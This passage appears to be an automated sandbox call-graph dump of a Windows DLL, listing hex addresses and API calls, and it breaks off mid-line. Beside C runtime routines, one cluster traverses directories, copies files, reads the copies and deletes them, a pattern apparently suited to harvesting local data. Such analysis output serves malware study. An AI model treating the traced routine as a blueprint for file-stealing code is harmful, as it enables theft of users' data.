6703->6707 6703->6708 6710 236679e6 40 API calls __fassign 6703->6710 6712 236695d2 WriteFile 6703->6712 6771 23667c19 6703->6771 6704 23662ada _ValidateLocalCookies 5 API calls 6705 23669641 6704->6705 6705->6666 6707->6708 6709 236695a1 WriteFile 6707->6709 6708->6704 6709->6703 6711 2366962a GetLastError 6709->6711 6710->6703 6711->6708 6712->6703 6712->6711 6718 23669816 6713->6718 6714 236698d8 6715 23662ada _ValidateLocalCookies 5 API calls 6714->6715 6717 236698f1 6715->6717 6716 23669894 WriteFile 6716->6718 6719 236698da GetLastError 6716->6719 6717->6666 6718->6714 6718->6716 6719->6714 6721 23669904 6720->6721 6722 23669a0f 6721->6722 6725 23669986 WideCharToMultiByte 6721->6725 6727 236699bb WriteFile 6721->6727 6723 23662ada _ValidateLocalCookies 5 API calls 6722->6723 6724 23669a1e 6723->6724 6724->6666 6726 23669a07 GetLastError 6725->6726 6725->6727 6726->6722 6727->6721 6727->6726 6729 23669737 6728->6729 6730 236697ea 6729->6730 6732 236697a9 WriteFile 6729->6732 6731 23662ada _ValidateLocalCookies 5 API calls 6730->6731 6734 23669803 6731->6734 6732->6729 6733 236697ec GetLastError 6732->6733 6733->6730 6734->6666 6736 23666355 __dosmaperr 20 API calls 6735->6736 6737 2366633d _free 6736->6737 6738 23666368 _free 20 API calls 6737->6738 6739 23666350 6738->6739 6739->6672 6749 23668d52 6740->6749 6742 23669f9f 6743 23669fa7 6742->6743 6744 23669fb8 SetFilePointerEx 6742->6744 6745 23666368 _free 20 API calls 6743->6745 6746 23669fd0 GetLastError 6744->6746 6747 23669fac 6744->6747 6745->6747 6748 23666332 __dosmaperr 20 API calls 6746->6748 6747->6650 6748->6747 6750 23668d74 6749->6750 6751 23668d5f 6749->6751 6753 23666355 __dosmaperr 20 API calls 6750->6753 6756 23668d99 6750->6756 6752 23666355 __dosmaperr 20 API calls 6751->6752 6754 23668d64 6752->6754 6757 23668da4 6753->6757 6755 23666368 _free 20 API calls 6754->6755 6759 23668d6c 6755->6759 6756->6742 6758 23666368 _free 20 API calls 6757->6758 6760 23668dac 6758->6760 6759->6742 6761 236662ac ___std_exception_copy 26 API calls 6760->6761 6761->6759 6763 23668dc9 6762->6763 6765 23668dd6 6762->6765 6764 23666368 _free 20 API calls 6763->6764 6766 23668dce 6764->6766 6767 23668de2 6765->6767 6768 23666368 _free 20 API calls 6765->6768 6766->6692 6767->6692 6769 23668e03 6768->6769 6770 236662ac ___std_exception_copy 26 API calls 6769->6770 6770->6766 6772 23665af6 _abort 38 API calls 6771->6772 6773 23667c24 6772->6773 6774 23667a00 __fassign 38 API calls 6773->6774 6775 23667c34 6774->6775 6775->6703 6776->6686 6780 2366ad24 6777->6780 6779 2366adca 6779->6603 6781 2366ad30 ___DestructExceptionObject 6780->6781 6791 23668c7b RtlEnterCriticalSection 6781->6791 6783 2366ad3e 6784 2366ad65 6783->6784 6785 2366ad70 6783->6785 6792 2366ae4d 6784->6792 6787 23666368 _free 20 API calls 6785->6787 6788 2366ad6b 6787->6788 6807 2366ad9a 6788->6807 6790 2366ad8d _abort 6790->6779 6791->6783 6793 23668d52 26 API calls 6792->6793 6795 2366ae5d 6793->6795 6794 2366ae63 6810 23668cc1 6794->6810 6795->6794 6797 23668d52 26 API calls 6795->6797 6806 2366ae95 6795->6806 6800 2366ae8c 6797->6800 6798 23668d52 26 API calls 6801 2366aea1 CloseHandle 6798->6801 6804 23668d52 26 API calls 6800->6804 6801->6794 6805 2366aead GetLastError 6801->6805 6802 23666332 __dosmaperr 20 API calls 6803 2366aedd 6802->6803 6803->6788 6804->6806 6805->6794 6806->6794 6806->6798 6819 23668c9e RtlLeaveCriticalSection 6807->6819 6809 2366ada4 6809->6790 6811 23668d37 6810->6811 6812 23668cd0 6810->6812 6813 23666368 _free 20 API calls 6811->6813 6812->6811 6817 23668cfa 6812->6817 6814 23668d3c 6813->6814 6815 23666355 __dosmaperr 20 API calls 6814->6815 6816 23668d27 6815->6816 6816->6802 6816->6803 6817->6816 6818 23668d21 SetStdHandle 6817->6818 6818->6816 6819->6809 6820->6575 6821->6555 6822 23665348 6825 23663529 6822->6825 6826 23663532 6825->6826 6832 23663543 6825->6832 6833 2366391b 6826->6833 6834 23663925 6833->6834 6835 23663537 6833->6835 6845 23663b2c 6834->6845 6837 23663972 6835->6837 6838 2366397d 6837->6838 6840 2366353c 6837->6840 6839 23663987 RtlDeleteCriticalSection 6838->6839 6839->6839 6839->6840 6841 23663c50 6840->6841 6842 23663c59 6841->6842 6844 23663c7f 6841->6844 6843 23663c69 FreeLibrary 6842->6843 6842->6844 6843->6842 6844->6832 6850 23663a82 6845->6850 6847 23663b46 6848 23663b5e TlsFree 6847->6848 6849 23663b52 6847->6849 6848->6849 6849->6835 6851 23663aaa 6850->6851 6855 23663aa6 __crt_fast_encode_pointer 6850->6855 6851->6855 6856 236639be 6851->6856 6854 23663ac4 GetProcAddress 6854->6855 6855->6847 6858 236639cd try_get_first_available_module 6856->6858 6857 236639ea LoadLibraryExW 6857->6858 6859 23663a05 GetLastError 6857->6859 6858->6857 6860 23663a60 FreeLibrary 6858->6860 6861 23663a77 6858->6861 6862 23663a38 LoadLibraryExW 6858->6862 6859->6858 6860->6858 6861->6854 6861->6855 6862->6858 6863 23662049 6864 23662055 ___DestructExceptionObject 6863->6864 6865 2366205e 6864->6865 6866 236620d3 6864->6866 6867 2366207d 6864->6867 6898 23662639 IsProcessorFeaturePresent 6866->6898 6877 2366244c 6867->6877 6870 236620da 6871 23662082 6886 23662308 6871->6886 6873 23662087 __RTC_Initialize 6889 236620c4 6873->6889 6875 2366209f 6892 2366260b 6875->6892 6878 23662451 ___scrt_release_startup_lock 6877->6878 6879 23662455 6878->6879 6882 23662461 6878->6882 6880 2366527a _abort 20 API calls 6879->6880 6881 2366245f 6880->6881 6881->6871 6883 2366246e 6882->6883 6884 2366499b _abort 28 API calls 6882->6884 6883->6871 6885 23664bbd 6884->6885 6885->6871 6902 236634c7 RtlInterlockedFlushSList 6886->6902 6888 23662312 6888->6873 6904 2366246f 6889->6904 6891 236620c9 ___scrt_release_startup_lock 6891->6875 6893 23662617 6892->6893 6894 2366262d 6893->6894 6923 236653ed 6893->6923 6894->6865 6897 23663529 ___vcrt_uninitialize 8 API calls 6897->6894 6899 2366264e ___scrt_fastfail 6898->6899 6900 236626f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6899->6900 6901 23662744 ___scrt_fastfail 6900->6901 6901->6870 6903 236634d7 6902->6903 6903->6888 6909 236653ff 6904->6909 6907 2366391b ___vcrt_uninitialize_ptd 6 API calls 6908 2366354d 6907->6908 6908->6891 6912 23665c2b 6909->6912 6913 23665c35 6912->6913 6914 23662476 6912->6914 6916 23665db2 6913->6916 6914->6907 6917 23665c45 __dosmaperr 5 API calls 6916->6917 6918 23665dd9 6917->6918 6919 23665df1 TlsFree 6918->6919 6920 23665de5 6918->6920 6919->6920 6921 23662ada _ValidateLocalCookies 5 API calls 6920->6921 6922 23665e02 6921->6922 6922->6914 6926 236674da 6923->6926 6927 236674f3 6926->6927 6928 23662ada _ValidateLocalCookies 5 API calls 6927->6928 6929 23662625 6928->6929 6929->6897 7765 23668a89 7766 23666d60 51 API calls 7765->7766 7767 23668a8e 7766->7767 7198 23664ed7 7209 23666d60 7198->7209 7203 23664ef4 7205 2366571e _free 20 API calls 7203->7205 7206 23664f29 7205->7206 7207 23664eff 7208 2366571e _free 20 API calls 7207->7208 7208->7203 7210 23666d69 7209->7210 7212 23664ee9 7209->7212 7242 23666c5f 7210->7242 7213 23667153 GetEnvironmentStringsW 7212->7213 7214 2366716a 7213->7214 7224 236671bd 7213->7224 7215 23667170 WideCharToMultiByte 7214->7215 7218 2366718c 7215->7218 7215->7224 7216 236671c6 FreeEnvironmentStringsW 7217 23664eee 7216->7217 7217->7203 7225 23664f2f 7217->7225 7219 236656d0 21 API calls 7218->7219 7220 23667192 7219->7220 7221 23667199 WideCharToMultiByte 7220->7221 7222 236671af 7220->7222 7221->7222 7223 2366571e _free 20 API calls 7222->7223 7223->7224 7224->7216 7224->7217 7226 23664f44 7225->7226 7227 2366637b __dosmaperr 20 API calls 7226->7227 7228 23664f6b 7227->7228 7229 23664fcf 7228->7229 7232 2366637b __dosmaperr 20 API calls 7228->7232 7233 23664fd1 7228->7233 7235 2366544d ___std_exception_copy 26 API calls 7228->7235 7238 23664ff3 7228->7238 7240 2366571e _free 20 API calls 7228->7240 7230 2366571e _free 20 API calls 7229->7230 7231 23664fe9 7230->7231 7231->7207 7232->7228 7234 23665000 20 API calls 7233->7234 7236 23664fd7 7234->7236 7235->7228 7237 2366571e _free 20 API calls 7236->7237 7237->7229 7239 236662bc ___std_exception_copy 11 API calls 7238->7239 7241 23664fff 7239->7241 7240->7228 7243 23665af6 _abort 38 API calls 7242->7243 7244 23666c6c 7243->7244 7245 23666d7e __fassign 38 API calls 7244->7245 7246 23666c74 7245->7246 7262 236669f3 7246->7262 7249 23666c8b 7249->7212 7252 23666cce 7255 2366571e _free 20 API calls 7252->7255 7255->7249 7256 23666cc9 7257 23666368 _free 20 API calls 7256->7257 7257->7252 7258 23666d12 7258->7252 7286 236668c9 7258->7286 7259 23666ce6 7259->7258 7260 2366571e _free 20 API calls 7259->7260 7260->7258 7263 236654a7 __fassign 38 API calls 7262->7263 7264 23666a05 7263->7264 7265 23666a26 7264->7265 7266 23666a14 GetOEMCP 7264->7266 7267 23666a3d 7265->7267 7268 23666a2b GetACP 7265->7268 7266->7267 7267->7249 7269 236656d0 7267->7269 7268->7267 7270 2366570e 7269->7270 7274 236656de __dosmaperr 7269->7274 7271 23666368 _free 20 API calls 7270->7271 7273 2366570c 7271->7273 7272 236656f9 RtlAllocateHeap 7272->7273 7272->7274 7273->7252 7276 23666e20 7273->7276 7274->7270 7274->7272 7275 2366474f __dosmaperr 7 API calls 7274->7275 7275->7274 7277 236669f3 40 API calls 7276->7277 7278 23666e3f 7277->7278 7281 23666e90 IsValidCodePage 7278->7281 7283 23666e46 7278->7283 7285 23666eb5 ___scrt_fastfail 7278->7285 7279 23662ada _ValidateLocalCookies 5 API calls 7280 23666cc1 7279->7280 7280->7256 7280->7259 7282 23666ea2 GetCPInfo 7281->7282 7281->7283 7282->7283 7282->7285 7283->7279 7289 23666acb GetCPInfo 7285->7289 7362 23666886 7286->7362 7288 236668ed 7288->7252 7290 23666baf 7289->7290 7295 23666b05 7289->7295 7292 23662ada _ValidateLocalCookies 5 API calls 7290->7292 7294 23666c5b 7292->7294 7294->7283 7299 236686e4 7295->7299 7298 23668a3e 43 API calls 7298->7290 7300 236654a7 __fassign 38 API calls 7299->7300 7301 23668704 MultiByteToWideChar 7300->7301 7303 236687da 7301->7303 7304 23668742 7301->7304 7305 23662ada _ValidateLocalCookies 5 API calls 7303->7305 7306 236656d0 21 API calls 7304->7306 7309 23668763 ___scrt_fastfail 7304->7309 7307 23666b66 7305->7307 7306->7309 7313 23668a3e 7307->7313 7308 236687d4 7318 23668801 7308->7318 7309->7308 7311 236687a8 MultiByteToWideChar 7309->7311 7311->7308 7312 236687c4 GetStringTypeW 7311->7312 7312->7308 7314 236654a7 __fassign 38 API calls 7313->7314 7315 23668a51 7314->7315 7322 23668821 7315->7322 7319 2366881e 7318->7319 7320 2366880d 7318->7320 7319->7303 7320->7319 7321 2366571e _free 20 API calls 7320->7321 7321->7319 7323 2366883c 7322->7323 7324 23668862 MultiByteToWideChar 7323->7324 7325 2366888c 7324->7325 7326 23668a16 7324->7326 7329 236656d0 21 API calls 7325->7329 7331 236688ad 7325->7331 7327 23662ada _ValidateLocalCookies 5 API calls 7326->7327 7328 23666b87 7327->7328 7328->7298 7329->7331 7330 236688f6 MultiByteToWideChar 7332 2366890f 7330->7332 7348 23668962 7330->7348 7331->7330 7331->7348 7349 23665f19 7332->7349 7334 23668801 __freea 20 API calls 7334->7326 7336 23668971 7338 23668992 7336->7338 7341 236656d0 21 API calls 7336->7341 7337 23668939 7339 23665f19 11 API calls 7337->7339 7337->7348 7340 23668a07 7338->7340 7342 23665f19 11 API calls 7338->7342 7339->7348 7343 23668801 __freea 20 API calls 7340->7343 7341->7338 7344 236689e6 7342->7344 7343->7348 7344->7340 7345 236689f5 WideCharToMultiByte 7344->7345 7345->7340 7346 23668a35 7345->7346 7347 23668801 __freea 20 API calls 7346->7347 7347->7348 7348->7334 7350 23665c45 __dosmaperr 5 API calls 7349->7350 7351 23665f40 7350->7351 7354 23665f49 7351->7354 7357 23665fa1 7351->7357 7355 23662ada _ValidateLocalCookies 5 API calls 7354->7355 7356 23665f9b 7355->7356 7356->7336 7356->7337 7356->7348 7358 23665c45 __dosmaperr 5 API calls 7357->7358 7359 23665fc8 7358->7359 7360 23662ada _ValidateLocalCookies 5 API calls 7359->7360 7361 23665f89 LCMapStringW 7360->7361 7361->7354 7363 23666892 ___DestructExceptionObject 7362->7363 7370 23665671 RtlEnterCriticalSection 7363->7370 7365 2366689c 7371 236668f1 7365->7371 7369 236668b5 _abort 7369->7288 7370->7365 7383 23667011 7371->7383 7373 2366693f 7374 23667011 26 API calls 7373->7374 7375 2366695b 7374->7375 7376 23667011 26 API calls 7375->7376 7377 23666979 7376->7377 7378 236668a9 7377->7378 7379 2366571e _free 20 API calls 7377->7379 7380 236668bd 7378->7380 7379->7378 7397 236656b9 RtlLeaveCriticalSection 7380->7397 7382 236668c7 7382->7369 7384 23667022 7383->7384 7388 2366701e 7383->7388 7385 23667029 7384->7385 7389 2366703c ___scrt_fastfail 7384->7389 7386 23666368 _free 20 API calls 7385->7386 7387 2366702e 7386->7387 7390 236662ac ___std_exception_copy 26 API calls 7387->7390 7388->7373 7389->7388 7391 23667073 7389->7391 7392 2366706a 7389->7392 7390->7388 7391->7388 7395 23666368 _free 20 API calls 7391->7395 7393 23666368 _free 20 API calls 7392->7393 7394 2366706f 7393->7394 7396 236662ac ___std_exception_copy 26 API calls 7394->7396 7395->7394 7396->7388 7397->7382 7398 236673d5 7399 236673e1 ___DestructExceptionObject 7398->7399 7410 23665671 RtlEnterCriticalSection 7399->7410 7401 236673e8 7411 23668be3 7401->7411 7403 236673f7 7404 23667406 7403->7404 7424 23667269 GetStartupInfoW 7403->7424 7435 23667422 7404->7435 7408 23667417 _abort 7410->7401 7412 23668bef ___DestructExceptionObject 7411->7412 7413 23668c13 7412->7413 7414 23668bfc 7412->7414 7438 23665671 RtlEnterCriticalSection 7413->7438 7416 23666368 _free 20 API calls 7414->7416 7417 23668c01 7416->7417 7418 236662ac ___std_exception_copy 26 API calls 7417->7418 7420 23668c0b _abort 7418->7420 7419 23668c4b 7446 23668c72 7419->7446 7420->7403 7421 23668c1f 7421->7419 7439 23668b34 7421->7439 7425 23667286 7424->7425 7427 23667318 7424->7427 7426 23668be3 27 API calls 7425->7426 7425->7427 7428 236672af 7426->7428 7430 2366731f 7427->7430 7428->7427 7429 236672dd GetFileType 7428->7429 7429->7428 7432 23667326 7430->7432 7431 23667369 GetStdHandle 7431->7432 7432->7431 7433 236673d1 7432->7433 7434 2366737c GetFileType 7432->7434 7433->7404 7434->7432 7450 236656b9 RtlLeaveCriticalSection 7435->7450 7437 23667429 7437->7408 7438->7421 7440 2366637b __dosmaperr 20 API calls 7439->7440 7442 23668b46 7440->7442 7441 23668b53 7443 2366571e _free 20 API calls 7441->7443 7442->7441 7445 23665eb7 11 API calls 7442->7445 7444 23668ba5 7443->7444 7444->7421 7445->7442 7449 236656b9 RtlLeaveCriticalSection 7446->7449 7448 23668c79 7448->7420 7449->7448 7450->7437 7451 236636d0 7452 236636e2 7451->7452 7454 236636f0 @_EH4_CallFilterFunc@8 7451->7454 7453 23662ada _ValidateLocalCookies 5 API calls 7452->7453 7453->7454 7768 23663c90 RtlUnwind 6930 23665351 6931 23665360 6930->6931 6932 23665374 6930->6932 6931->6932 6935 2366571e _free 20 API calls 6931->6935 6933 2366571e _free 20 API calls 6932->6933 6934 23665386 6933->6934 6936 2366571e _free 20 API calls 6934->6936 6935->6932 6937 23665399 6936->6937 6938 2366571e _free 20 API calls 6937->6938 6939 236653aa 6938->6939 6940 2366571e _free 20 API calls 6939->6940 6941 236653bb 6940->6941 7093 2366281c 7094 23662882 std::exception::exception 27 API calls 7093->7094 7095 2366282a 7094->7095 7455 23664bdd 7456 23664bec 7455->7456 7457 23664c08 7455->7457 7456->7457 7459 23664bf2 7456->7459 7458 23666d60 51 API calls 7457->7458 7460 23664c0f GetModuleFileNameA 7458->7460 7461 23666368 _free 20 API calls 7459->7461 7463 23664c33 7460->7463 7462 23664bf7 7461->7462 7464 236662ac ___std_exception_copy 26 API calls 7462->7464 7478 23664d01 7463->7478 7465 23664c01 7464->7465 7468 23664e76 20 API calls 7469 23664c5d 7468->7469 7470 23664c66 7469->7470 7471 23664c72 7469->7471 7472 23666368 _free 20 API calls 7470->7472 7473 23664d01 38 API calls 7471->7473 7477 23664c6b 7472->7477 7474 23664c88 7473->7474 7476 2366571e _free 20 API calls 7474->7476 7474->7477 7475 2366571e _free 20 API calls 7475->7465 7476->7477 7477->7475 7480 23664d26 7478->7480 7481 23664d86 7480->7481 7484 236670eb 7480->7484 7482 23664c50 7481->7482 7483 236670eb 38 API calls 7481->7483 7482->7468 7483->7481 7487 23667092 7484->7487 7488 236654a7 __fassign 38 API calls 7487->7488 7489 236670a6 7488->7489 7489->7480 7769 23664a9a 7770 23665411 38 API calls 7769->7770 7771 23664aa2 7770->7771 5754 23661c5b 5755 23661c6b ___scrt_fastfail 5754->5755 5758 236612ee 5755->5758 5757 23661c87 5759 23661324 ___scrt_fastfail 5758->5759 5760 236613b7 GetEnvironmentVariableW 5759->5760 5784 236610f1 5760->5784 5763 236610f1 57 API calls 5764 23661465 5763->5764 5765 236610f1 57 API calls 5764->5765 5766 23661479 5765->5766 5767 236610f1 57 API calls 5766->5767 5768 2366148d 5767->5768 5769 236610f1 57 API calls 5768->5769 5770 236614a1 5769->5770 5771 236610f1 57 API calls 5770->5771 5772 236614b5 lstrlenW 5771->5772 5773 236614d2 5772->5773 5774 236614d9 lstrlenW 5772->5774 5773->5757 5775 236610f1 57 API calls 5774->5775 5776 23661501 lstrlenW lstrcatW 5775->5776 5777 236610f1 57 API calls 5776->5777 5778 23661539 lstrlenW lstrcatW 5777->5778 5779 236610f1 57 API calls 5778->5779 5780 2366156b lstrlenW lstrcatW 5779->5780 5781 236610f1 57 API calls 5780->5781 5782 2366159d lstrlenW lstrcatW 5781->5782 5783 236610f1 57 API calls 5782->5783 5783->5773 5785 23661118 ___scrt_fastfail 5784->5785 5786 23661129 lstrlenW 5785->5786 5797 23662c40 5786->5797 5789 23661177 lstrlenW FindFirstFileW 5791 236611a0 5789->5791 5792 236611e1 5789->5792 5790 23661168 lstrlenW 5790->5789 5793 236611c7 FindNextFileW 5791->5793 5794 236611aa 5791->5794 5792->5763 5793->5791 5796 236611da FindClose 5793->5796 5794->5793 5799 23661000 5794->5799 5796->5792 5798 23661148 lstrcatW lstrlenW 5797->5798 5798->5789 5798->5790 5800 23661022 ___scrt_fastfail 5799->5800 5801 236610af 5800->5801 5802 2366102f lstrcatW lstrlenW 5800->5802 5805 236610b5 lstrlenW 5801->5805 5815 236610ad 5801->5815 5803 2366105a lstrlenW 5802->5803 5804 2366106b lstrlenW 5802->5804 5803->5804 5816 23661e89 lstrlenW 5804->5816 5830 23661e16 5805->5830 5808 23661088 GetFileAttributesW 5810 2366109c 5808->5810 5808->5815 5809 236610ca 5811 23661e89 5 API calls 5809->5811 5809->5815 5810->5815 5822 2366173a 5810->5822 5812 236610df 5811->5812 5835 236611ea 5812->5835 5815->5794 5817 23662c40 ___scrt_fastfail 5816->5817 5818 23661ea7 lstrcatW lstrlenW 5817->5818 5819 23661ec2 5818->5819 5820 23661ed1 lstrcatW 5818->5820 5819->5820 5821 23661ec7 lstrlenW 5819->5821 5820->5808 5821->5820 5823 23661747 ___scrt_fastfail 5822->5823 5850 23661cca 5823->5850 5826 2366199f 5826->5815 5828 23661824 ___scrt_fastfail _strlen 5828->5826 5870 236615da 5828->5870 5831 23661e29 5830->5831 5834 23661e4c 5830->5834 5832 23661e2d lstrlenW 5831->5832 5831->5834 5833 23661e3f lstrlenW 5832->5833 5832->5834 5833->5834 5834->5809 5836 2366120e ___scrt_fastfail 5835->5836 5837 23661e89 5 API calls 5836->5837 5838 23661220 GetFileAttributesW 5837->5838 5839 23661246 5838->5839 5840 23661235 5838->5840 5841 23661e89 5 API calls 5839->5841 5840->5839 5842 2366173a 35 API calls 5840->5842 5843 23661258 5841->5843 5842->5839 5844 236610f1 56 API calls 5843->5844 5845 2366126d 5844->5845 5846 23661e89 5 API calls 5845->5846 5847 2366127f ___scrt_fastfail 5846->5847 5848 236610f1 56 API calls 5847->5848 5849 236612e6 5848->5849 5849->5815 5851 23661cf1 ___scrt_fastfail 5850->5851 5852 23661d0f CopyFileW CreateFileW 5851->5852 5853 23661d44 DeleteFileW 5852->5853 5854 23661d55 GetFileSize 5852->5854 5859 23661808 5853->5859 5855 23661ede 22 API calls 5854->5855 5856 23661d66 ReadFile 5855->5856 5857 23661d94 CloseHandle DeleteFileW 5856->5857 5858 23661d7d CloseHandle DeleteFileW 5856->5858 5857->5859 5858->5859 5859->5826 5860 23661ede 5859->5860 5862 2366222f 5860->5862 5863 2366224e 5862->5863 5866 23662250 5862->5866 5878 2366474f 5862->5878 5883 236647e5 5862->5883 5863->5828 5865 23662908 5867 236635d2 __CxxThrowException@8 RaiseException 5865->5867 5866->5865 5890 236635d2 5866->5890 5869 23662925 5867->5869 5869->5828 5871 2366160c _strcat _strlen 5870->5871 5872 2366163c lstrlenW 5871->5872 5978 23661c9d 5872->5978 5874 23661655 lstrcatW lstrlenW 5875 23661678 5874->5875 5876 23661693 ___scrt_fastfail 5875->5876 5877 2366167e lstrcatW 5875->5877 5876->5828 5877->5876 5893 23664793 5878->5893 5881 2366478f 5881->5862 5882 23664765 5899 23662ada 5882->5899 5888 236656d0 __dosmaperr 5883->5888 5884 2366570e 5912 23666368 5884->5912 5886 236656f9 RtlAllocateHeap 5887 2366570c 5886->5887 5886->5888 5887->5862 5888->5884 5888->5886 5889 2366474f __dosmaperr 7 API calls 5888->5889 5889->5888 5892 236635f2 RaiseException 5890->5892 5892->5865 5894 2366479f ___DestructExceptionObject 5893->5894 5906 23665671 RtlEnterCriticalSection 5894->5906 5896 236647aa 5907 236647dc 5896->5907 5898 236647d1 _abort 5898->5882 5900 23662ae5 IsProcessorFeaturePresent 5899->5900 5901 23662ae3 5899->5901 5903 23662b58 5900->5903 5901->5881 5911 23662b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5903->5911 5905 23662c3b 5905->5881 5906->5896 5910 236656b9 RtlLeaveCriticalSection 5907->5910 5909 236647e3 5909->5898 5910->5909 5911->5905 5915 23665b7a GetLastError 5912->5915 5916 23665b93 5915->5916 5917 23665b99 5915->5917 5934 23665e08 5916->5934 5921 23665bf0 SetLastError 5917->5921 5941 2366637b 5917->5941 5923 23665bf9 5921->5923 5922 23665bb3 5948 2366571e 5922->5948 5923->5887 5927 23665bcf 5961 2366593c 5927->5961 5928 23665bb9 5930 23665be7 SetLastError 5928->5930 5930->5923 5932 2366571e _free 17 API calls 5933 23665be0 5932->5933 5933->5921 5933->5930 5966 23665c45 5934->5966 5936 23665e2f 5937 23665e47 TlsGetValue 5936->5937 5940 23665e3b 5936->5940 5937->5940 5938 23662ada _ValidateLocalCookies 5 API calls 5939 23665e58 5938->5939 5939->5917 5940->5938 5947 23666388 __dosmaperr 5941->5947 5942 236663c8 5944 23666368 _free 19 API calls 5942->5944 5943 236663b3 RtlAllocateHeap 5945 23665bab 5943->5945 5943->5947 5944->5945 5945->5922 5954 23665e5e 5945->5954 5946 2366474f __dosmaperr 7 API calls 5946->5947 5947->5942 5947->5943 5947->5946 5949 23665752 _free 5948->5949 5950 23665729 HeapFree 5948->5950 5949->5928 5950->5949 5951 2366573e 5950->5951 5952 23666368 _free 18 API calls 5951->5952 5953 23665744 GetLastError 5952->5953 5953->5949 5955 23665c45 __dosmaperr 5 API calls 5954->5955 5956 23665e85 5955->5956 5957 23665ea0 TlsSetValue 5956->5957 5958 23665e94 5956->5958 5957->5958 5959 23662ada _ValidateLocalCookies 5 API calls 5958->5959 5960 23665bc8 5959->5960 5960->5922 5960->5927 5972 23665914 5961->5972 5969 23665c71 5966->5969 5971 23665c75 __crt_fast_encode_pointer 5966->5971 5967 23665c95 5970 23665ca1 GetProcAddress 5967->5970 5967->5971 5968 23665ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5968->5969 5969->5967 5969->5968 5969->5971 5970->5971 5971->5936 5973 23665854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 5972->5973 5974 23665938 5973->5974 5975 236658c4 5974->5975 5976 23665758 __dosmaperr 20 API calls 5975->5976 5977 236658e8 5976->5977 5977->5932 5979 23661ca6 _strlen 5978->5979 5979->5874 7490 236620db 7492 236620e7 ___DestructExceptionObject 7490->7492 7491 236620f6 7492->7491 7493 23662110 dllmain_raw 7492->7493 7497 2366210b 7492->7497 7493->7491 7494 2366212a 7493->7494 7503 23661eec 7494->7503 7496 23662177 7496->7491 7498 23661eec 31 API calls 7496->7498 7497->7491 7497->7496 7500 23661eec 31 API calls 7497->7500 7499 2366218a 7498->7499 7499->7491 7501 23662193 dllmain_raw 7499->7501 7502 2366216d dllmain_raw 7500->7502 7501->7491 7502->7496 7504 23661ef7 7503->7504 7505 23661f2a dllmain_crt_process_detach 7503->7505 7506 23661f1c dllmain_crt_process_attach 7504->7506 7507 23661efc 7504->7507 7508 23661f06 7505->7508 7506->7508 7509 23661f12 7507->7509 7510 23661f01 7507->7510 7508->7497 7518 236623ec 7509->7518 7510->7508 7513 2366240b 7510->7513 7526 236653e5 7513->7526 7619 23663513 7518->7619 7521 236623f5 7521->7508 7524 23662408 7524->7508 7525 2366351e 7 API calls 7525->7521 7532 23665aca 7526->7532 7529 2366351e 7608 23663820 7529->7608 7531 23662415 7531->7508 7533 23665ad4 7532->7533 7536 23662410 7532->7536 7534 23665e08 __dosmaperr 11 API calls 7533->7534 7535 23665adb 7534->7535 7535->7536 7537 23665e5e __dosmaperr 11 API calls 7535->7537 7536->7529 7538 23665aee 7537->7538 7540 236659b5 7538->7540 7541 236659d0 7540->7541 7542 236659c0 7540->7542 7541->7536 7546 236659d6 7542->7546 7545 2366571e _free 20 API calls 7545->7541 7547 236659ef 7546->7547 7548 236659e9 7546->7548 7550 2366571e _free 20 API calls 7547->7550 7549 2366571e _free 20 API calls 7548->7549 7549->7547 7551 236659fb 7550->7551 7552 2366571e _free 20 API calls 7551->7552 7553 23665a06 7552->7553 7554 2366571e _free 20 API calls 7553->7554 7555 23665a11 7554->7555 7556 2366571e _free 20 API calls 7555->7556 7557 23665a1c 7556->7557 7558 2366571e _free 20 API calls 7557->7558 7559 23665a27 7558->7559 7560 2366571e _free 20 API calls 7559->7560 7561 23665a32 7560->7561 7562 2366571e _free 20 API calls 7561->7562 7563 23665a3d 7562->7563 7564 2366571e _free 20 API calls 7563->7564 7565 23665a48 7564->7565 7566 2366571e _free 20 API calls 7565->7566 7567 23665a56 7566->7567 7572 2366589c 7567->7572 7578 236657a8 7572->7578 7574 236658c0 7575 236658ec 7574->7575 7591 23665809 7575->7591 7577 23665910 7577->7545 7579 236657b4 ___DestructExceptionObject 7578->7579 7586 23665671 RtlEnterCriticalSection 7579->7586 7581 236657be 7584 2366571e _free 20 API calls 7581->7584 7585 236657e8 7581->7585 7583 236657f5 _abort 7583->7574 7584->7585 7587 236657fd 7585->7587 7586->7581 7590 236656b9 RtlLeaveCriticalSection 7587->7590 7589 23665807 7589->7583 7590->7589 7592 23665815 ___DestructExceptionObject 7591->7592 7599 23665671 RtlEnterCriticalSection 7592->7599 7594 2366581f 7600 23665a7f 7594->7600 7596 23665832 7604 23665848 7596->7604 7598 23665840 _abort 7598->7577 7599->7594 7601 23665ab5 __fassign 7600->7601 7602 23665a8e __fassign 7600->7602 7601->7596 7602->7601 7603 23667cc2 __fassign 20 API calls 7602->7603 7603->7601 7607 236656b9 RtlLeaveCriticalSection 7604->7607 7606 23665852 7606->7598 7607->7606 7609 2366382d 7608->7609 7613 2366384b ___vcrt_freefls@4 7608->7613 7610 2366383b 7609->7610 7614 23663b67 7609->7614 7611 23663ba2 ___vcrt_FlsSetValue 6 API calls 7610->7611 7611->7613 7613->7531 7615 23663a82 try_get_function 5 API calls 7614->7615 7616 23663b81 7615->7616 7617 23663b99 TlsGetValue 7616->7617 7618 23663b8d 7616->7618 7617->7618 7618->7610 7625 23663856 7619->7625 7621 236623f1 7621->7521 7622 236653da 7621->7622 7623 23665b7a __dosmaperr 20 API calls 7622->7623 7624 236623fd 7623->7624 7624->7524 7624->7525 7626 23663862 GetLastError 7625->7626 7627 2366385f 7625->7627 7628 23663b67 ___vcrt_FlsGetValue 6 API calls 7626->7628 7627->7621 7629 23663877 7628->7629 7630 236638dc SetLastError 7629->7630 7631 23663ba2 ___vcrt_FlsSetValue 6 API calls 7629->7631 7636 23663896 7629->7636 7630->7621 7632 23663890 7631->7632 7633 23663ba2 ___vcrt_FlsSetValue 6 API calls 7632->7633 7635 236638b8 7632->7635 7632->7636 7633->7635 7634 23663ba2 ___vcrt_FlsSetValue 6 API calls 7634->7636 7635->7634 7635->7636 7636->7630 7096 23662418 7097 23662420 ___scrt_release_startup_lock 7096->7097 7100 236647f5 7097->7100 7099 23662448 7101 23664804 7100->7101 7102 23664808 7100->7102 7101->7099 7105 23664815 7102->7105 7106 23665b7a __dosmaperr 20 API calls 7105->7106 7109 